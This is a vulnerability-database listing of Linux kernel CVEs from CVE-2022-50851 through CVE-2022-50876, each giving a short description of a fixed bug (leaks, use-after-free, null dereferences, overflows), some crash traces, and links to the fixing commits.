| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vhost_vdpa: fix the crash in unmap a large memory While testing in vIOMMU, sometimes the Guest will unmap a very large memory region, which will cause the crash. To fix this, add a new function vhost_vdpa_general_unmap(). This function will only unmap the memory that is saved in the iotlb. Call Trace: [ 647.820144] ------------[ cut here ]------------ [ 647.820848] kernel BUG at drivers/iommu/intel/iommu.c:1174! [ 647.821486] invalid opcode: 0000 [#1] PREEMPT SMP PTI [ 647.822082] CPU: 10 PID: 1181 Comm: qemu-system-x86 Not tainted 6.0.0-rc1home_lulu_2452_lulu7_vhost+ #62 [ 647.823139] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.15.0-29-g6a62e0cb0dfe-prebuilt.qem4 [ 647.824365] RIP: 0010:domain_unmap+0x48/0x110 [ 647.825424] Code: 48 89 fb 8d 4c f6 1e 39 c1 0f 4f c8 83 e9 0c 83 f9 3f 7f 18 48 89 e8 48 d3 e8 48 85 c0 75 59 [ 647.828064] RSP: 0018:ffffae5340c0bbf0 EFLAGS: 00010202 [ 647.828973] RAX: 0000000000000001 RBX: ffff921793d10540 RCX: 000000000000001b [ 647.830083] RDX: 00000000080000ff RSI: 0000000000000001 RDI: ffff921793d10540 [ 647.831214] RBP: 0000000007fc0100 R08: ffffae5340c0bcd0 R09: 0000000000000003 [ 647.832388] R10: 0000007fc0100000 R11: 0000000000100000 R12: 00000000080000ff [ 647.833668] R13: ffffae5340c0bcd0 R14: ffff921793d10590 R15: 0000008000100000 [ 647.834782] FS: 00007f772ec90640(0000) GS:ffff921ce7a80000(0000) knlGS:0000000000000000 [ 647.836004] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 647.836990] CR2: 00007f02c27a3a20 CR3: 0000000101b0c006 CR4: 0000000000372ee0 [ 647.838107] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 647.839283] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 647.840666] Call Trace: [ 647.841437] <TASK> [ 647.842107] intel_iommu_unmap_pages+0x93/0x140 [ 647.843112] __iommu_unmap+0x91/0x1b0 [ 647.844003] iommu_unmap+0x6a/0x95 [ 647.844885] vhost_vdpa_unmap+0x1de/0x1f0 [vhost_vdpa] [ 647.845985] vhost_vdpa_process_iotlb_msg+0xf0/0x90b [vhost_vdpa] [ 647.847235] ? _raw_spin_unlock+0x15/0x30 [ 647.848181] ? _copy_from_iter+0x8c/0x580 [ 647.849137] vhost_chr_write_iter+0xb3/0x430 [vhost] [ 647.850126] vfs_write+0x1e4/0x3a0 [ 647.850897] ksys_write+0x53/0xd0 [ 647.851688] do_syscall_64+0x3a/0x90 [ 647.852508] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 647.853457] RIP: 0033:0x7f7734ef9f4f [ 647.854408] Code: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 29 76 f8 ff 48 8b 54 24 18 48 8b 74 24 10 41 89 c8 [ 647.857217] RSP: 002b:00007f772ec8f040 EFLAGS: 00000293 ORIG_RAX: 0000000000000001 [ 647.858486] RAX: ffffffffffffffda RBX: 00000000fef00000 RCX: 00007f7734ef9f4f [ 647.859713] RDX: 0000000000000048 RSI: 00007f772ec8f090 RDI: 0000000000000010 [ 647.860942] RBP: 00007f772ec8f1a0 R08: 0000000000000000 R09: 0000000000000000 [ 647.862206] R10: 0000000000000001 R11: 0000000000000293 R12: 0000000000000010 [ 647.863446] R13: 0000000000000002 R14: 0000000000000000 R15: ffffffff01100000 [ 647.864692] </TASK> [ 647.865458] Modules linked in: rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs v] [ 647.874688] ---[ end trace 0000000000000000 ]--- | 2025-12-30 | not yet calculated | CVE-2022-50851 | https://git.kernel.org/stable/c/26b7400c89b81e2f6de4f224ba1fdf06f293de31 https://git.kernel.org/stable/c/8b258a31c2e8d4d4e42be70a7c6ca35a5afbff0d https://git.kernel.org/stable/c/e794070af224ade46db368271896b2685ff4f96b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7921: fix use after free in mt7921_acpi_read() Don't dereference "sar_root" after it has been freed. | 2025-12-30 | not yet calculated | CVE-2022-50852 | https://git.kernel.org/stable/c/3ed0b382cb36f6dac9f93b3a5533cfcd699409a5 https://git.kernel.org/stable/c/e7de4b4979bd8d313ec837931dde936653ca82ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSv4: Fix a credential leak in _nfs4_discover_trunking() | 2025-12-30 | not yet calculated | CVE-2022-50853 | https://git.kernel.org/stable/c/c6aca4c7ba8f6d40a0cfeeb09160dd8efdf97c64 https://git.kernel.org/stable/c/dfad5d5e7511933c2ae3d12a8131840074c5a73d https://git.kernel.org/stable/c/b247a9828f6607d41189fa6c2a3be754d33cae86 https://git.kernel.org/stable/c/e83458fce080dc23c25353a1af90bfecf79c7369 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfc: virtual_ncidev: Fix memory leak in virtual_nci_send() The skb should be freed in virtual_nci_send(), otherwise kmemleak will report a memleak. Steps for reproduction (simulated in qemu): cd tools/testing/selftests/nci make ./nci_dev BUG: memory leak unreferenced object 0xffff888107588000 (size 208): comm "nci_dev", pid 206, jiffies 4294945376 (age 368.248s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<000000008d94c8fd>] __alloc_skb+0x1da/0x290 [<00000000278bc7f8>] nci_send_cmd+0xa3/0x350 [<0000000081256a22>] nci_reset_req+0x6b/0xa0 [<000000009e721112>] __nci_request+0x90/0x250 [<000000005d556e59>] nci_dev_up+0x217/0x5b0 [<00000000e618ce62>] nfc_dev_up+0x114/0x220 [<00000000981e226b>] nfc_genl_dev_up+0x94/0xe0 [<000000009bb03517>] genl_family_rcv_msg_doit.isra.14+0x228/0x2d0 [<00000000b7f8c101>] genl_rcv_msg+0x35c/0x640 [<00000000c94075ff>] netlink_rcv_skb+0x11e/0x350 [<00000000440cfb1e>] genl_rcv+0x24/0x40 [<0000000062593b40>] netlink_unicast+0x43f/0x640 [<000000001d0b13cc>] netlink_sendmsg+0x73a/0xbf0 [<000000003272487f>] __sys_sendto+0x324/0x370 [<00000000ef9f1747>] __x64_sys_sendto+0xdd/0x1b0 [<000000001e437841>] do_syscall_64+0x3f/0x90 | 2025-12-30 | not yet calculated | CVE-2022-50854 | https://git.kernel.org/stable/c/88e879c9f59511174ef0ab1a3c9c83e2dbf8a213 https://git.kernel.org/stable/c/2c46a9a5f0b1c7341aa67667801079f3ff571678 https://git.kernel.org/stable/c/e840d8f4a1b323973052a1af5ad4edafcde8ae3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: prevent leak of lsm program after failed attach In [0], we added the ability to bpf_prog_attach LSM programs to cgroups, but in our validation to make sure the prog is meant to be attached to BPF_LSM_CGROUP, we return too early if the check fails. This results in lack of decrementing prog's refcnt (through bpf_prog_put) leaving the LSM program alive past the point of the expected lifecycle. This fix allows for the decrement to take place. [0] https://lore.kernel.org/all/20220628174314.1216643-4-sdf@google.com/ | 2025-12-30 | not yet calculated | CVE-2022-50855 | https://git.kernel.org/stable/c/82b39df5ddb298daaf6dc504032ff7eb027fa106 https://git.kernel.org/stable/c/6a1504dd36cd9a0a69250d61da8bdb17b29f1fe8 https://git.kernel.org/stable/c/e89f3edffb860a0f54a9ed16deadb7a4a1fa3862 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix xid leak in cifs_ses_add_channel() Before returning, the xid should be freed; otherwise, the xid will be leaked. | 2025-12-30 | not yet calculated | CVE-2022-50856 | https://git.kernel.org/stable/c/7286f875510486fdc2fc426b7c826262e2283a65 https://git.kernel.org/stable/c/847301f0ee1c29f34cc48547ce1071990f24969c https://git.kernel.org/stable/c/db2a8b6c17e128d91f35d836c569f4a6bda4471b https://git.kernel.org/stable/c/e909d054bdea75ef1ec48c18c5936affdaecbb2c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rapidio: rio: fix possible name leak in rio_register_mport() If device_register() returns an error, the name allocated by dev_set_name() needs to be freed. It should use put_device() to give up the reference in the error path, so that the name can be freed in kobject_cleanup(), and list_del() is called to delete the port from rio_mports. | 2025-12-30 | not yet calculated | CVE-2022-50857 | https://git.kernel.org/stable/c/0a71344f99289250e4d5b8adbac76f444485c840 https://git.kernel.org/stable/c/117fede82e9d6ea3de30746d500eb5edc2eb8310 https://git.kernel.org/stable/c/a73a626c0510d203e369aeb26c4d6ec9c75af027 https://git.kernel.org/stable/c/1bbad5793f404cf218757e3beb600eca6080330f https://git.kernel.org/stable/c/97d9eb45ffa67ffa112a6659953321b8f7db0065 https://git.kernel.org/stable/c/a47de2fd3f88a7788be19f94ade72c2244a98045 https://git.kernel.org/stable/c/4ddbeae5f224d924cf0b12460dda88c7480aa452 https://git.kernel.org/stable/c/9abba4aa60874c5216fc8de7dededadc791de696 https://git.kernel.org/stable/c/e92a216d16bde65d21a3227e0fb2aa0794576525 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: alcor: fix return value check of mmc_add_host() mmc_add_host() may return an error; if we ignore its return value, the memory allocated in mmc_alloc_host() will be leaked and it will lead to a kernel crash because of deleting a device that was never added in the remove path. So fix this by checking the return value and calling mmc_free_host() in the error path. | 2025-12-30 | not yet calculated | CVE-2022-50858 | https://git.kernel.org/stable/c/289c964fe182ce755044a6cd57698072e12ffa6f https://git.kernel.org/stable/c/4a6e5d0222804a3eaf2ea4cf893f412e7cf98cb2 https://git.kernel.org/stable/c/29c5b4da41f35108136d843c7432885c78cf8272 https://git.kernel.org/stable/c/48dc06333d75f41c2ce9ba954bc3231324b45914 https://git.kernel.org/stable/c/60fafcf2fb7ee9a4125dc9a86eeb9d490acf23e2 https://git.kernel.org/stable/c/e93d1468f429475a753d6baa79b853b7ee5ef8c0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix the error length of VALIDATE_NEGOTIATE_INFO message Commit d5c7076b772a ("smb3: add smb3.1.1 to default dialect list") extended the dialects from 3 to 4, but forgot to decrease the extended length when specifying the dialect, so the message length is larger than expected. This may leak some info over the network because the message body is not initialized. After applying this patch, the VALIDATE_NEGOTIATE_INFO message length is reduced from 28 bytes to 26 bytes. | 2025-12-30 | not yet calculated | CVE-2022-50859 | https://git.kernel.org/stable/c/d0050ec3ebbcb3451df9a65b8460be9b9e02e80c https://git.kernel.org/stable/c/9312e04b6c6bc46354ecd0cc82052a2b3df0b529 https://git.kernel.org/stable/c/60480291c1fcafad8425d93f771b5bcc2bd398b4 https://git.kernel.org/stable/c/943eb0ede74ecd609fdfd3f0b83e0d237613e526 https://git.kernel.org/stable/c/fada9b8c95c77bb46b89e18117405bc90fce9f74 https://git.kernel.org/stable/c/e98ecc6e94f4e6d21c06660b0f336df02836694f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: Fix memleak in alloc_ns() After the changes in commit a1bd627b46d1 ("apparmor: share profile name on replacement"), the hname member of struct aa_policy is not a valid slab object but a subset of one, so it cannot be freed by kfree_sensitive(); use aa_policy_destroy() to fix it. | 2025-12-30 | not yet calculated | CVE-2022-50860 | https://git.kernel.org/stable/c/9a32aa87a25d800b2c6f47bc2749a7bfd9a486f3 https://git.kernel.org/stable/c/5f509fa740b17307f0cba412485072f632d5af36 https://git.kernel.org/stable/c/0250cf8d37bb5201a117177afd24dc73a1c81657 https://git.kernel.org/stable/c/12695b4b76d437b9c0182a6f7dfb2248013a9daf https://git.kernel.org/stable/c/e9e6fa49dbab6d84c676666f3fe7d360497fd65b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSD: Finish converting the NFSv2 GETACL result encoder The xdr_stream conversion inadvertently left some code that set the page_len of the send buffer. The XDR stream encoders should handle this automatically now. This oversight adds garbage past the end of the Reply message. Clients typically ignore the garbage, but NFSD does not need to send it, as it leaks stale memory contents onto the wire. | 2025-12-30 | not yet calculated | CVE-2022-50861 | https://git.kernel.org/stable/c/a20b0abab966a189a79aba6ebf41f59024a3224d https://git.kernel.org/stable/c/5030d4d2bf8b6f6f3d16401ab92a88bc5aa2377a https://git.kernel.org/stable/c/d5b867fd2d7f79630b1a2906a7bb4f4b75bf297a https://git.kernel.org/stable/c/2b825efb0577a32a872e872a869e0947cf9dd6d3 https://git.kernel.org/stable/c/ea5021e911d3479346a75ac9b7d9dcd751b0fb99 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: prevent decl_tag from being referenced in func_proto Syzkaller was able to hit the following issue: ------------[ cut here ]------------ WARNING: CPU: 0 PID: 3609 at kernel/bpf/btf.c:1946 btf_type_id_size+0x2d5/0x9d0 kernel/bpf/btf.c:1946 Modules linked in: CPU: 0 PID: 3609 Comm: syz-executor361 Not tainted 6.0.0-syzkaller-02734-g0326074ff465 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/22/2022 RIP: 0010:btf_type_id_size+0x2d5/0x9d0 kernel/bpf/btf.c:1946 Code: ef e8 7f 8e e4 ff 41 83 ff 0b 77 28 f6 44 24 10 18 75 3f e8 6d 91 e4 ff 44 89 fe bf 0e 00 00 00 e8 20 8e e4 ff e8 5b 91 e4 ff <0f> 0b 45 31 f6 e9 98 02 00 00 41 83 ff 12 74 18 e8 46 91 e4 ff 44 RSP: 0018:ffffc90003cefb40 EFLAGS: 00010293 RAX: 0000000000000000 RBX: 0000000000000002 RCX: 0000000000000000 RDX: ffff8880259c0000 RSI: ffffffff81968415 RDI: 0000000000000005 RBP: ffff88801270ca00 R08: 0000000000000005 R09: 000000000000000e R10: 0000000000000011 R11: 0000000000000000 R12: 0000000000000000 R13: 0000000000000011 R14: ffff888026ee6424 R15: 0000000000000011 FS: 000055555641b300(0000) GS:ffff8880b9a00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000f2e258 CR3: 000000007110e000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> btf_func_proto_check kernel/bpf/btf.c:4447 [inline] btf_check_all_types kernel/bpf/btf.c:4723 [inline] btf_parse_type_sec kernel/bpf/btf.c:4752 [inline] btf_parse kernel/bpf/btf.c:5026 [inline] btf_new_fd+0x1926/0x1e70 kernel/bpf/btf.c:6892 bpf_btf_load kernel/bpf/syscall.c:4324 [inline] __sys_bpf+0xb7d/0x4cf0 kernel/bpf/syscall.c:5010 __do_sys_bpf kernel/bpf/syscall.c:5069 [inline] __se_sys_bpf kernel/bpf/syscall.c:5067 [inline] __x64_sys_bpf+0x75/0xb0 kernel/bpf/syscall.c:5067 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7f0fbae41c69 Code: 28 c3 e8 2a 14 00 00 66 2e 0f 1f 84 00 00 00 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 c0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffc8aeb6228 EFLAGS: 00000246 ORIG_RAX: 0000000000000141 RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f0fbae41c69 RDX: 0000000000000020 RSI: 0000000020000140 RDI: 0000000000000012 RBP: 00007f0fbae05e10 R08: 0000000000000000 R09: 0000000000000000 R10: 00000000ffffffff R11: 0000000000000246 R12: 00007f0fbae05ea0 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 </TASK> Looks like it tries to create a func_proto whose return type is decl_tag. For the details, see Martin's spot-on analysis in [0]. 0: https://lore.kernel.org/bpf/CAKH8qBuQDLva_hHxxBuZzyAcYNO4ejhovz6TQeVSk8HY-2SO6g@mail.gmail.com/T/#mea6524b3fcd6298347432226e81b1e6155efc62c | 2025-12-30 | not yet calculated | CVE-2022-50862 | https://git.kernel.org/stable/c/e9dbb4c539d058852b76937dcd7347d3f38054f2 https://git.kernel.org/stable/c/ea68376c8bed5cd156900852aada20c3a0874d17 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw89: free unused skb to prevent memory leak This avoids a potential memory leak under power saving mode. | 2025-12-30 | not yet calculated | CVE-2022-50863 | https://git.kernel.org/stable/c/d4b4f6ff8ff1b87d25977423cf38fb61744d0023 https://git.kernel.org/stable/c/216c59b66f2d0c428a4fdaa24dc28cd6be4a2bf6 https://git.kernel.org/stable/c/eae672f386049146058b9e5d3d33e9e4af9dca1d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix shift-out-of-bounds due to too large exponent of block size If field s_log_block_size of superblock data is corrupted and too large, init_nilfs() and load_nilfs() still can trigger a shift-out-of-bounds warning followed by a kernel panic (if panic_on_warn is set): shift exponent 38973 is too large for 32-bit type 'int' Call Trace: <TASK> dump_stack_lvl+0xcd/0x134 ubsan_epilogue+0xb/0x50 __ubsan_handle_shift_out_of_bounds.cold.12+0x17b/0x1f5 init_nilfs.cold.11+0x18/0x1d [nilfs2] nilfs_mount+0x9b5/0x12b0 [nilfs2] ... This fixes the issue by adding and using a new helper function for getting block size with sanity check. | 2025-12-30 | not yet calculated | CVE-2022-50864 | https://git.kernel.org/stable/c/ec93b5430ec0f60877a5388bb023d60624f9ab9f https://git.kernel.org/stable/c/8b6ef451b5701b37d9a5905534595776a662edfc https://git.kernel.org/stable/c/ddb6615a168f97b91175e00eda4c644741cf531c https://git.kernel.org/stable/c/a16731fa1b96226c75bbf18e73513b14fc318360 https://git.kernel.org/stable/c/ebeccaaef67a4895d2496ab8d9c2fb8d89201211 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tcp: fix a signed-integer-overflow bug in tcp_add_backlog() The type of sk_rcvbuf and sk_sndbuf in struct sock is int, and in tcp_add_backlog(), the variable limit is calculated by adding sk_rcvbuf, sk_sndbuf and 64 * 1024; it may exceed the max value of int and overflow. This patch reduces the limit budget by halving the sndbuf to solve this issue, since ACK packets are much smaller than the payload. | 2025-12-30 | not yet calculated | CVE-2022-50865 | https://git.kernel.org/stable/c/9d04b4d0feee12bce6bfe37f30d8e953d3c30368 https://git.kernel.org/stable/c/4f23cb2be530785db284a685d1b1c30224d8a538 https://git.kernel.org/stable/c/a85d39f14aa8a71e29cfb5eb5de02878a8779898 https://git.kernel.org/stable/c/28addf029417d53b1df062b4c87feb7bc033cb5f https://git.kernel.org/stable/c/ec791d8149ff60c40ad2074af3b92a39c916a03f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: pxa: fix null-pointer dereference in filter() kasprintf() returns a NULL pointer when kmalloc() fails to allocate. The returned pointer needs to be checked before calling strcmp(). | 2025-12-30 | not yet calculated | CVE-2022-50866 | https://git.kernel.org/stable/c/3ec75e0ea9550b8f2e531172f2e67ba9d5227ec3 https://git.kernel.org/stable/c/5b510a82740d2a42a75b5661b402bcaf8ae22cd5 https://git.kernel.org/stable/c/0abd1d78317a3a2dfe00b203fbf14ee7df537e0a https://git.kernel.org/stable/c/a8baccb79de2f48a2083d51febf627eb50ce1898 https://git.kernel.org/stable/c/21a1409e8cf73053b54f7860548e3043dfa351a9 https://git.kernel.org/stable/c/83baa509396a742e0ce145b09fde1ce0a948f49a https://git.kernel.org/stable/c/9fb9b3b67a5b8669296d6372cd901ef86557e6f6 https://git.kernel.org/stable/c/21b92cf41952577a95bfa430e39478cbd66e42a7 https://git.kernel.org/stable/c/ec7bf231aaa1bdbcb69d23bc50c753c80fb22429 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/a6xx: Fix kvzalloc vs state_kcalloc usage adreno_show_object() is a trap! It will re-allocate the pointer it is passed on first call, when the data is ascii85 encoded, using kvmalloc/ kvfree(). Which means the data *passed* to it must be kvmalloc'd, ie. we cannot use the state_kcalloc() helper. This partially reverts commit ec8f1813bf8d ("drm/msm/a6xx: Replace kcalloc() with kvzalloc()"), but adds the missing kvfree() to fix the memory leak that was present previously. And adds a warning comment. Patchwork: https://patchwork.freedesktop.org/patch/507014/ | 2025-12-30 | not yet calculated | CVE-2022-50867 | https://git.kernel.org/stable/c/4b1bbc0571a5d7ee10f754186dc3d619b9ced5c1 https://git.kernel.org/stable/c/83d18e9d9c0150d98dc24e3642ea93f5e245322c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwrng: amd - Fix PCI device refcount leak for_each_pci_dev() is implemented by pci_get_device(). The comment of pci_get_device() says that it will increase the reference count for the returned pci_dev and also decrease the reference count for the input pci_dev @from if it is not NULL. If we break for_each_pci_dev() loop with pdev not NULL, we need to call pci_dev_put() to decrease the reference count. Add the missing pci_dev_put() for the normal and error path. | 2025-12-30 | not yet calculated | CVE-2022-50868 | https://git.kernel.org/stable/c/f1c97f72ffd504f49882774e2ab689d982dc7afc https://git.kernel.org/stable/c/526c316948819d3ecd2bb20fe5e2580c51a1b760 https://git.kernel.org/stable/c/e246f5eff26055bdcb61a2cc99c50af72a19680f https://git.kernel.org/stable/c/1199f8e02941b326c60ab71a63002b7c80e38212 https://git.kernel.org/stable/c/5998e5c30e839f73e62cb29e0d9617b0d16ccba3 https://git.kernel.org/stable/c/2b79a5e560779b35e1164d57ae35c48b43373082 https://git.kernel.org/stable/c/cb348c7908631dd9f60083a0a1542eab055d3edf https://git.kernel.org/stable/c/2e10ecd012ae2b2a374b34f307e9bc1e6096c03d https://git.kernel.org/stable/c/ecadb5b0111ea19fc7c240bb25d424a94471eb7d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix slab-out-of-bounds in r_page When PAGE_SIZE is 64K, if read_log_page is called by log_read_rst for the first time, the size of *buffer would be equal to DefaultLogPageSize (4K). But for *buffer operations like memcpy, if the memory area size (n) which is being assigned to buffer is larger than 4K (log->page_size (64K) or bytes (64K-page_off)), it will cause an out-of-bounds error. Call trace: [...] kasan_report+0x44/0x130 check_memory_region+0xf8/0x1a0 memcpy+0xc8/0x100 ntfs_read_run_nb+0x20c/0x460 read_log_page+0xd0/0x1f4 log_read_rst+0x110/0x75c log_replay+0x1e8/0x4aa0 ntfs_loadlog_and_replay+0x290/0x2d0 ntfs_fill_super+0x508/0xec0 get_tree_bdev+0x1fc/0x34c [...] Fix this by setting variable r_page to NULL in log_read_rst. | 2025-12-30 | not yet calculated | CVE-2022-50869 | https://git.kernel.org/stable/c/ed686e7a26dd19ae6b46bb662f735acfa88ff7bc https://git.kernel.org/stable/c/bf86a640a34947d92062996e1a75b9cd9d83dd19 https://git.kernel.org/stable/c/6d076293e5bffdf897ea5f975669206e09beed6a https://git.kernel.org/stable/c/ecfbd57cf9c5ca225184ae266ce44ae473792132 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/rtas: avoid device tree lookups in rtas_os_term() rtas_os_term() is called during panic. Its behavior depends on a couple of conditions in the /rtas node of the device tree, the traversal of which entails locking and local IRQ state changes. If the kernel panics while devtree_lock is held, rtas_os_term() as currently written could hang. Instead of discovering the relevant characteristics at panic time, cache them in file-static variables at boot. Note the lookup for "ibm,extended-os-term" is converted to of_property_read_bool() since it is a boolean property, not an RTAS function token. [mpe: Incorporate suggested change from Nick] | 2025-12-30 | not yet calculated | CVE-2022-50870 | https://git.kernel.org/stable/c/e23822c7381c59d9e42e65771b6e17c71ed30ea7 https://git.kernel.org/stable/c/06a07fbb32b3a23eec20a42b1e64474da0a3b33e https://git.kernel.org/stable/c/c2fa91abf22a705cf02f886cd99cff41f4ceda60 https://git.kernel.org/stable/c/f2167f10fcca68ab9ae3f8d94d2c704c5541ac69 https://git.kernel.org/stable/c/d8939315b7342860df143afe0adda6212cdd3193 https://git.kernel.org/stable/c/698e682c849e356fb47a8be47ca8baa817cf31e0 https://git.kernel.org/stable/c/464d10e8d797454e16a173ef1292a446b2adf21c https://git.kernel.org/stable/c/ed2213bfb192ab51f09f12e9b49b5d482c6493f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: Fix qmi_msg_handler data structure initialization qmi_msg_handler is required to be null terminated by the QMI module. There might be a case where a handler for a msg id is not present in the handlers array, which can lead to an infinite loop while searching for the handler and therefore an out-of-bounds access in qmi_invoke_handler(). Hence update the initialization in the qmi_msg_handler data structure. Tested-on: IPQ8074 hw2.0 AHB WLAN.HK.2.5.0.1-01100-QCAHKSWPL_SILICONZ-1 | 2025-12-30 | not yet calculated | CVE-2022-50871 | https://git.kernel.org/stable/c/d5d71de448f36e34592f7c81b5e300d3e8dbb735 https://git.kernel.org/stable/c/a10e1530c424bb277b4edc7def0195857a548495 https://git.kernel.org/stable/c/ed3725e15a154ebebf44e0c34806c57525483f92 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ARM: OMAP2+: Fix memory leak in realtime_counter_init() The "sys_clk" resource is malloced by clk_get(); it is not released when the function returns. | 2025-12-30 | not yet calculated | CVE-2022-50872 | https://git.kernel.org/stable/c/5f9aedabce3404dd8bb769822fc11317c55fbdc1 https://git.kernel.org/stable/c/e3a6af3059e4f83d1a986a3180eb1e04f99c9e64 https://git.kernel.org/stable/c/8041f9a2a958277f95926560dc85910aecd48c0b https://git.kernel.org/stable/c/4862c41d5f3bee1ec64c979c82bd8cfe96b78f7d https://git.kernel.org/stable/c/10fcdad2b9f3f424873714eb8713a3e6f7ab84bb https://git.kernel.org/stable/c/98df4bdf3b010c23cc3c542d0c303016e5fceb40 https://git.kernel.org/stable/c/4f7ad1b08533247c4bf29217ba499ea4138cc2c1 https://git.kernel.org/stable/c/ed8167cbf65c2b6ff6faeb0f96ded4d6d581e1ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vdpa/vp_vdpa: fix kfree a wrong pointer in vp_vdpa_remove In vp_vdpa_remove(), the code kfree(&vp_vdpa_mgtdev->mgtdev.id_table) uses a reference to the pointer as the argument of kfree, which is the wrong pointer and may then hit a crash like this: Unable to handle kernel paging request at virtual address 00ffff003363e30c Internal error: Oops: 96000004 [#1] SMP Call trace: rb_next+0x20/0x5c ext4_readdir+0x494/0x5c4 [ext4] iterate_dir+0x168/0x1b4 __se_sys_getdents64+0x68/0x170 __arm64_sys_getdents64+0x24/0x30 el0_svc_common.constprop.0+0x7c/0x1bc do_el0_svc+0x2c/0x94 el0_svc+0x20/0x30 el0_sync_handler+0xb0/0xb4 el0_sync+0x160/0x180 Code: 54000220 f9400441 b4000161 aa0103e0 (f9400821) SMP: stopping secondary CPUs Starting crashdump kernel... | 2025-12-30 | not yet calculated | CVE-2022-50873 | https://git.kernel.org/stable/c/8fe12680b2c731201519935013ec9219c93ec540 https://git.kernel.org/stable/c/6ccc891f36d0c20ee220551caabdcd3886ec584b https://git.kernel.org/stable/c/ed843d6ed7310a27cf7c8ee0a82a482eed0cb4a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/erdma: Fix refcount leak in erdma_mmap rdma_user_mmap_entry_get() takes a reference; we should release it when it is not needed anymore. Add the missing rdma_user_mmap_entry_put() in the error path to fix it. | 2025-12-30 | not yet calculated | CVE-2022-50874 | https://git.kernel.org/stable/c/8372207b009d6abdd60bb05624640bd86386599f https://git.kernel.org/stable/c/410f0f46ffca4d0102470c1e0c747ecfece4204c https://git.kernel.org/stable/c/ee84146c05ad2316b9a7222d0ec4413e0bf30eeb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: of: overlay: fix null pointer dereferencing in find_dup_cset_node_entry() and find_dup_cset_prop() When kmalloc() fails to allocate memory in kasprintf(), fn_1 or fn_2 will be NULL, and strcmp() will cause a null pointer dereference. | 2025-12-30 | not yet calculated | CVE-2022-50875 | https://git.kernel.org/stable/c/9ec5781879b4535ad59b5354b385825378e45618 https://git.kernel.org/stable/c/2b4af99b44861646013821019dd13a4ac48c0219 https://git.kernel.org/stable/c/ce1b3a41e7964cb8dd56a702a95dd90ad27f51cd https://git.kernel.org/stable/c/ab5bb7bbacf531de8e32912cc2e21f906113cee8 https://git.kernel.org/stable/c/71d88c7453ec3d2ceff98e18ce4d6354abd3b5b6 https://git.kernel.org/stable/c/ee9d7a0e754568180a2f8ebc4aad226278a9116f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: musb: Fix musb_gadget.c rxstate overflow bug The usb function device call musb_gadget_queue() adds the passed request to musb_ep::req_list. If (request->length > musb_ep->packet_sz) and (is_buffer_mapped(req) returns false), rxstate() will copy all data in the fifo to request->buf, which may cause request->buf to go out of bounds. Fix it by adding the length check: fifocnt = min_t(unsigned, request->length - request->actual, fifocnt); | 2025-12-30 | not yet calculated | CVE-2022-50876 | https://git.kernel.org/stable/c/826f84ab04a5cafe484ea9c2c85a3930068e5cb7 https://git.kernel.org/stable/c/a1008c8b9f357691ce6a8fdb8f157aecb2d79167 https://git.kernel.org/stable/c/7c80f3a918ba9aa26fb699ee887064ec3af0396a https://git.kernel.org/stable/c/d6afcab1b48f4051211c50145b9e91be3b1b42c9 https://git.kernel.org/stable/c/acf0006f2b2b2ca672988875fd154429aafb2a9b https://git.kernel.org/stable/c/3c84c7f592c4ba38f54ddaddd0115acc443025db https://git.kernel.org/stable/c/a9ccd2ab1becf5dcb6d57e9fcd981f5eaa606c96 